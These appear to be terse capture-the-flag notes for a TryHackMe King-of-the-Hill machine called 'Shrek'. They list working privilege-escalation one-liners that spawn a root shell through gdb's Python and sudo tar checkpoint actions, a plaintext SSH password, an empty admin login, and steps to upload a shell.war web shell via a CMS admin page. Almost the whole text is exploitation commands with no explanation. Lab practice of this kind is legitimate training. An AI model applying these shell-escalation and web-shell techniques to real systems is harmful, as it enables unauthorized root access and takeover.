TryHackMe KoTH Machine - Shrek
Last updated 7 months ago
shrek
*** Privilege escalation of shrek user ***
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
get credentials for ftp login
get message.txt
donkey
ssh -T donkey@shrek.thm
pass `J5rURvCa8DyTg3vR`
tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
user `admin` pass ``
upload shell.war
/upload /cms /api
80
Navigate to http://shrek.thm/cms/admin
http://shrek.thm/cms/admin